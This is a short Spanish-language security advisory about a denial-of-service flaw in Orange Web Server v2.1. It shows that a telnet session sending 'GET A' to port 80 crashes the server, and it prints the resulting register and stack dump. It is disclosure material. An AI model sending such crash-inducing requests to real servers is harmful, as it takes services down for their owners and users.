Orange Web Server v2.1 se ve afectado por una vulnerabilidad que
posibilita a un usuario malicioso la realización de un ataque de
denegación de servicios.
Este servidor web perteneciente a GoAhead Technology y que corre sobre
todas las plataformas Microsoft Windows, facilita el convertir nuestro
ordenador en un potente servidor web.
La denegación de servicio que afecta a Orange Web Server v2.1 es
sorprendente por la facilidad de su explotación. Un atacante tan sólo
tendría que hacer un Telnet al puerto 80 de la dirección objeto de su
investigación y realizar una petición tipo GET A, con esta simple
petición podrá conseguir la caída del servidor. Dando como resultado un
volcado del tipo:
Petición:
telnet 192.168.0.20 80
GET A
Volcado:
ORANGEWEBSERVER caused an invalid page fault
in module ORANGEWEBSERVER.EXE at
016f:00409694.
Registers:
EAX=49703d50 CS=016f EIP=00409694
EFLGS=00010246 EBX=009dfe84 SS=0177
ESP=009dfbb8 EBP=009dfe8c ECX=00000000
DS=0177 ESI=00416362 FS=84cf EDX=00000000
ES=0177 EDI=00000000 GS=0000 Bytes at CS:EIP:
f7 71 04 5e 8b c2 c3 90 90 90 90 90 56 8b 74 24
Stack dump:
00416350 004094a7 00000000 00416350 ffffffff
009dfbf0 009dfe8c 009dfe84 00418644 ffffffff
006d8e8c 00410b62 00000000 00416350 006d949c
00000000
antonio_roman@hispasec.com
Más información:
Orange Web Server v2.1 DoS:
http://www.securityfocus.com/archive/1/165658
Deja una respuesta